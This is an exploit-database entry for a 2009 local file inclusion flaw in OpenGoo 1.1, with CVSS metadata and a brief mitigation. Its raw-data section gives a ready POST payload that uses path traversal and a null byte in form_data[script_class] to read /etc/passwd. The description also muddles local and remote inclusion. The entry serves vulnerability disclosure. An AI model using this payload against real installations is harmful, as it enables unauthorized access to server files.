header-logo
Suggest Exploit
vendor:
OpenGoo
by:
Notified
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: OpenGoo
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: No
Related CWE: N/A
CPE: a:opengoo:opengoo:1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

OpenGoo 1.1 Local File Inclusion

OpenGoo 1.1 is vulnerable to Local File Inclusion. This vulnerability is due to the register_globals and magic_quotes_gpc settings being set to On and Off respectively. This allows an attacker to include a remote file by manipulating the form_data[script_class] parameter in a POST request.

Mitigation:

Ensure that register_globals and magic_quotes_gpc are set to Off.
Source

Exploit-DB raw data:

OpenGoo 1.1 Local File Inclusion
http://www.opengoo.org/

magic_quotes_gpc = Off
register_globals = On

http://site/opengoo/public/upgrade/index.php
POST: form_data[script_class]=/../../../../../../../../../../../etc/passwd%00.html

Author Notified: Jan. 18

http://nukeit.org

# milw0rm.com [2009-01-25]

Navigation

Suggest Exploit

Services By CQR